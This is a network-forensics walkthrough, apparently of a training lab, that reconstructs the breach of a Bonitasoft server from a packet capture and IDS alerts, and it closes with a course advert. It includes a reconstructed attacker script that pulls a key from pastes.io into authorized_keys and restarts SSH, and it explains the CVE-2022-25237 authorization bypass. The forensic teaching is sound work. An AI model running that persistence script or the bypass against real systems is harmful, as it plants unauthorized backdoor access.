Our subject is a fast-growing startup that uses a business management platform. Documentation for that platform is limited, and the startup administrators have not followed strong security practices. For this exercise we act as the security team. Our objective is to confirm the compromise using network packet captures (PCAP) and exported security logs.

We obtained an archive containing the artifacts needed for the investigation. It includes a .pcap network traffic file and a .json file with security events. Wireshark will be our primary analysis tool.

[Figure: the network artifacts provided for the analysis]

Analysis

Defining Key IP Addresses

The company suspects its management platform was breached. To identify which platform and which hosts are involved, we start with the pcap file. In Wireshark, view the TCP endpoints from the Statistics menu and sort by packet count to see which IP addresses dominate the capture.

[Figure: Wireshark Endpoints view, sorted by received traffic]

This quickly highlights the IP address 172.31.6.44 as a major recipient of traffic. The traffic to that host uses ports 37022, 8080, 61254, 61255, and 22. Common service associations here are 8080 for HTTP and 22 for SSH; 37022 appears to be an arbitrary TCP data port used by the environment, and the remaining high ports are likely ephemeral client-side ports.

When you identify heavy talkers in a capture, export their connection lists and timestamps immediately. That gives you a focused subset to work from and preserves the context of later findings.
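If you prefer the command line, tshark (Wireshark’s terminal counterpart) produces the same summaries and is easy to save alongside your case notes. A minimal sketch, assuming the capture file is named traffic.pcap (substitute the actual name from your evidence archive):

# Summarize TCP endpoints, equivalent to Statistics -> Endpoints in the GUI
bash$ tshark -r traffic.pcap -q -z endpoints,tcp

# Summarize TCP conversations with relative start times and durations,
# which preserves the timing context mentioned above
bash$ tshark -r traffic.pcap -q -z conv,tcp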

Analyzing HTTP Traffic

The port usage suggests the management platform is web-based. Filter HTTP traffic in Wireshark with http.request to inspect client requests. The first notable entry is a GET request whose URL and headers match Bonitasoft’s platform, showing the company uses Bonitasoft for business management.

[Figure: HTTP requests that look like brute force]

Below that GET request you can see a series of authentication attempts (POST requests) originating from 156.146.62.213. The login attempts include usernames that reveal the attacker has done corporate OSINT and enumerated staff names.

The credentials used in the attack are not generic wordlist guesses; instead, the attacker tries a focused set of credentials. That behavior is consistent with credential stuffing: the attacker takes previously leaked username/password pairs (often from other breaches) and tries them against this service, typically in an automated fashion and sometimes distributed via a botnet to blend with normal traffic.

[Figure: credential stuffing spotted in the HTTP stream]
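To enumerate those login attempts outside the GUI, you can list every POST from the attacking address with its timestamp and body. A hedged sketch under the same traffic.pcap filename assumption:

# List timestamp, target URI, and submitted form data for each attempt
bash$ tshark -r traffic.pcap -Y 'http.request.method == "POST" && ip.src == 156.146.62.213' -T fields -e frame.time -e http.request.uri -e http.file_data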

A credential-stuffing event alone does not prove a successful compromise. The next step is to check whether any of the login attempts produced a successful authentication. Before doing that, we review the IDS/IPS alerts.

Finding the CVE

To inspect the JSON alert file in a shell environment, format it with jq and see what’s inside. Here is how you can make the JSON output easier to read:

bash$ cat alerts.json | jq .

[Figure: reading the alert log file]

Obviously, the file will be too big to read in full, so we narrow it down to indicators such as CVE identifiers:

bash$ cat alerts.json | jq . | grep -i cve

[Figure: grepping CVEs in the alert log file]

Security tools often map detected signatures to known CVE identifiers. In our case, alert data and correlation with the observed HTTP requests point to repeated attempts to exploit CVE-2022-25237, a vulnerability affecting Bonita Web 2021.2. The exploit abuses an overly broad exclusion pattern in the RestAPIAuthorizationFilter: URLs containing the i18ntranslation string are excluded from authorization checks. By appending that crafted suffix to a URL, an attacker can reach privileged API endpoints, potentially enabling remote code execution or privilege escalation.

[Figure: CVE-2022-25237 details]
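If the alert file follows the common Suricata eve.json layout, with one JSON object per line and the signature text under alert.signature (an assumption you should verify against your own file), jq can isolate just the relevant records:

# Keep only alerts whose signature text mentions a CVE
# (prepend '.[] | ' to the filter if the file is a single JSON array)
bash$ cat alerts.json | jq 'select(.alert.signature? // "" | test("CVE"))'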

Now we verify whether exploitation actually succeeded.

Exploitation

To find successful authentications, filter responses with:

http.response.code >= 200 and http.response.code < 300 and ip.addr == 172.31.6.44

[Figure: filtering HTTP responses for successful status codes]

Among the successful responses, HTTP 204 entries stand out because they are less common than HTTP 200. If we follow the HTTP stream for a 204 response, the request stream shows valid credentials followed immediately by a 204 response and cookie assignment. That means the attacker successfully logged in. This is the point where the attacker moves from probing to interacting with privileged endpoints.

[Figure: finding a successful authentication]
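The same check can be scripted with tshark, which is handy when you want the timestamps of every candidate success in one list. A sketch under the same filename assumption:

# List successful responses to the victim host; 204s with cookie assignment are the interesting ones
bash$ tshark -r traffic.pcap -Y 'http.response.code >= 200 && http.response.code < 300 && ip.addr == 172.31.6.44' -T fields -e frame.time -e http.response.code -e http.response_for.uri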

After authenticating, the attacker targets the API to exploit the vulnerability. In the traffic we can see an upload of rce_api_extension.zip, which enables remote code execution. Later this zip file will be deleted to remove unnecessary traces.

[Figure: finding the API abuse after authentication]
[Figure: the attacker uploads a zip file to abuse the API]

Following the upload, we can observe commands executed on the server. The attacker reads /etc/passwd and runs whoami. In the output we see access to sensitive system information.

[Figure: reading the passwd file]
[Figure: the attacker assessing his privileges]

During a forensic investigation you should extract the uploaded files from the capture or request the original file from the source system (if available). Analyzing the uploaded code is essential to understand the artifacts of compromise and to find indicators of lateral movement or backdoors.
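Wireshark can carve transferred files straight out of the capture via File -> Export Objects -> HTTP, and tshark can do the same unattended. A minimal sketch; the zip filename matches the upload observed in this capture:

# Carve all HTTP-transferred files from the capture into ./exported/
bash$ mkdir -p exported && tshark -r traffic.pcap -q --export-objects http,exported

# Hash the carved upload so it can be recorded in the chain of custody
bash$ sha256sum exported/rce_api_extension.zip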

Persistence

After initial control, attackers typically establish persistence. In this incident, all attacker activity is over HTTP, so we follow subsequent HTTP requests to find persistence mechanisms.

[Figure: the attacker establishes persistence via pastes.io]

The attacker downloads a script hosted on a paste service (pastes.io), named bx6gcr0et8, which in turn retrieves another snippet, hffgra4unv, and appends its output to /home/ubuntu/.ssh/authorized_keys when executed. The attacker then restarts SSH to apply the new key.

[Figure: reading the bash script used to establish persistence]
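Piecing the observed traffic together, the persistence script behaves roughly like the sketch below. This is a reconstruction, not the attacker’s literal file, and the pastes.io raw-download URL format is an assumption:

#!/bin/bash
# Hypothetical reconstruction of bx6gcr0et8 based on the captured behavior:
# fetch the second snippet (the attacker's public key), append it to the
# ubuntu user's authorized_keys, then restart SSH so the key takes effect
curl -s https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart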

A few lines below we can see that the first script was executed via bash, completing the persistence setup.

[Figure: the persistence script is executed]

Appending keys to authorized_keys gives the attacker’s key pair SSH access without requiring a password. It’s a stealthy persistence technique that avoids adding new files that antivirus might flag. In this case the attacker relied on built-in Linux mechanisms rather than installing malware.

When you find modifications to authorized_keys, pull the exact key material from the capture and compare it with known attacker keys or with subsequent SSH connection fingerprints. That helps attribute later logins to this initial persistence action.
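ssh-keygen makes that comparison mechanical once you have the key material. A sketch, with attacker_key.pub as an illustrative name for the recovered public key:

# Print the key's fingerprint for correlation with later SSH session
# fingerprints or threat-intelligence feeds
bash$ ssh-keygen -l -f attacker_key.pub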

[Figure: MITRE ATT&CK SSH Authorized Keys technique details]

Post-Exploitation

Further examination of the pcap shows the server reaching out to Ubuntu repositories to download a .deb package that contains Nmap. 

[Figure: the server downloads a .deb file containing Nmap]

Shortly after SSH access is obtained, we see traffic from a second IP address, 95.181.232.30, connecting over port 22. Correlating timestamps shows the command to download the .deb package was issued from that SSH session. Once Nmap is present, the attacker performs a port scan of 34.207.150.13.

[Figure: the attacker performs an Nmap scan]

This sequence, adding an SSH key, then using SSH to install reconnaissance tools and scan other hosts, fits a common post-exploitation pattern. Attackers establish persistent access, stage tools, and then enumerate the network for lateral movement opportunities.

During forensic investigations, save the sequence of timestamps that link file downloads, package installation, and scanning activity. Those correlations are important for incident timelines and for identifying which sessions performed which actions.
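One way to preserve those correlations is to dump a timestamped view of the second attacker address’s SSH session and line it up against the HTTP and repository traffic. A sketch under the same traffic.pcap assumption:

# Timestamped packet list for the attacker's SSH session, for the incident timeline
bash$ tshark -r traffic.pcap -Y 'ip.addr == 95.181.232.30 && tcp.port == 22' -T fields -e frame.time -e ip.src -e ip.dst -e tcp.len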

Timeline

At the start, the attacker attempted credential stuffing against the management server. Successful login occurred with the credentials seb.broom / g0vernm3nt. After authentication, the attacker exploited CVE-2022-25237 in Bonita Web 2021.2 to reach privileged API endpoints and uploaded rce_api_extension.zip. They then executed commands such as whoami and cat /etc/passwd to confirm privileges and enumerate users.

The attacker removed rce_api_extension.zip from the web server to reduce obvious traces. Using pastes.io from IP 138.199.59.221, the attacker executed a bash script that appended data to /home/ubuntu/.ssh/authorized_keys, enabling SSH persistence (MITRE ATT&CK: SSH Authorized Keys, T1098.004). Shortly after persistence was established, an SSH connection from 95.181.232.30 issued commands to download a .deb package containing Nmap. The attacker used Nmap to scan 34.207.150.13 and then terminated the SSH session.

Conclusion

During our network forensics exercise we saw how packet captures and IDS/IPS logs can reveal the flow of a compromise, from credential stuffing, through exploitation of a web-application vulnerability, to command execution and persistence via SSH keys. We practiced using Wireshark to trace HTTP streams, observed credential stuffing in action, and followed the attacker’s persistence mechanism.

Although our class focused on analysis, in real incidents you should always preserve originals and record every artifact with exact timestamps. Create cryptographic hashes of artifacts, maintain a chain of custody, and work only on copies. These steps protect the integrity of evidence and are essential if the incident leads to legal action.

For those of you interested in deepening your digital forensics skills, we will be running a practical SCADA forensics course this November. This intensive, hands-on course teaches forensic techniques specific to Industrial Control Systems and SCADA environments, showing you how to collect and preserve evidence from PLCs, RTUs, HMIs and engineering workstations, reconstruct attack chains, and identify indicators of compromise in OT networks. Practical OT/SCADA skills are rare and highly valued, so completing a course like this, with its focus on real-world labs and breach simulations, is definitely going to make your CV stand out.

We also offer digital forensics services for organizations and individuals. Contact us to discuss your case and which services suit your needs.

Learn more: https://hackersarise.thinkific.com/courses/scada-forensics

